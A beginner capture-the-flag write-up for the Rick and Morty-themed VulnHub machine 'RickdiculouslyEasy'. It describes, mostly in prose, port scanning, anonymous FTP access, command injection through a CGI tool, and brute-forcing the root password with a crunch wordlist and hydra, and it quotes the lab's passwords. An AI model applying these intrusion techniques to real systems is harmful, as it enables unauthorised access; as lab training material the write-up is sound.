CTF Write-up RickdiculouslyEasy - VulnHub
Rickdiculouslyeasy is a very simple Rick and Morty-themed boot to root machine. It’s designed to be a beginner CTF, if you’re new to pen testing, check it out! There are 130 points worth of flags available (each flag has its points recorded with it), we should also get root.
You can get the machine from the following link :
https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/
FINDING THE MACHINE IP
You can find the machine IP by using “netdiscover” command it helps you find all live the IP addresses in a network.
SCANNING & ENUMERATION
Nmap results
We found one flag in the N-map results on port 13337.
(10 points)
PORT 21(FTP service)
We find an FTP service, an FTP (File Transfer Protocol) login that allows you to create other
users that can upload files to your server. We can connect using anonymous as
the username and keep the password blank.
Found a flag by FTP connection….got the txt file using the get command. (20 points)
PORT 9090
In N-map results, we saw there was an HTTP service running at port 9090. We find a flag here, also the input fields on this page are unresponsive. (30 points)
PORT 60000
trying to netcat to port 60000 gave us another flag
(40 points)
PORT 80
we find that there is an HTTP service running in the machine at port 80. Let’s dive into it!
I did a directory search using dirsearch. Dirsearch is a command-line website
directory scanner. It includes Multithreading, making it a fast scanner tool. It
performs Recursive brute-forcing. It has HTTP proxy support.
I found a directory called /passwords/ I searched the same on the web. Another interesting directory is robots.txt
found another flag here.(50 points)
there is another HTML file in directory /passwords/, it gives us a hint.
Further viewing the page source we get a password to a user id :
Next we go to robot.txt diretory and found link to two files ‘/cgi-bin/root_shell.cgi’ and ‘/cgi-bin/ tracertool.cgi’.
Only ‘/cgi-bin/tracertool.cgi’ is found to be useful, this field is vulnerable to command injection.
Here I found 3 users. Next, I tried logging in via ssh on port 22222. Also, cat command is not functioning so I used tac instead of a cat.
EXPLOITING
I tried logging in by the hit and trial method, so we already know a password which is “winter”, hence I used it as a password for a user named Summer.
we logged in successfully as Summer and found another flag(60 points).
Enumerating further we find that there are three same users as we found earlier. We can’t enter to RickSanches, there is a zip file under user Morty, but unzipping that file needs a passwd. There is another jpg file saying password, so I found the password to the zip file using 'tac Safe_password.jpg'
passwd : "Meeseek"
Further, we unzip the text using the password. We find another flag and a hint. (80 points)
PS: This flag's format is a bit different, it did help later on.
so there was a binary file named safe which is not executing normally, it needs a parameter. Now we use the number found in the previous flag as a parameter to run this binary file. Which upon execution gave us another file. (100 points)
Also, we find a hint for the root password
PRIVILEGE ESCALATION
Now we got a hint that says the password contains an uppercase character a digit and one word from Rick’s old band name (which I found by searching and the name is “The Flesh Curtains”). So I used crunch for creating a wordlist.
Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations. So I used ‘,’ for an uppercase character, ‘%’ for a digit, and each of the words from the band name and added all the generated wordlists to a single word.txt file.
Next, I used ‘hydra’ to brute force the password for root. It is used to brute-force username and password to different services such as FTP, ssh, telnet, MS-SQL, etc. I used RickSanches as username and the wordlist for finding a password. We find the password to RickSanches ‘P7Curtains’. Now We have the access to the Ricksanches.
We change to the root user by simply using sudo su and we are the root!!…we found the root flag. Voila!! (130 points)
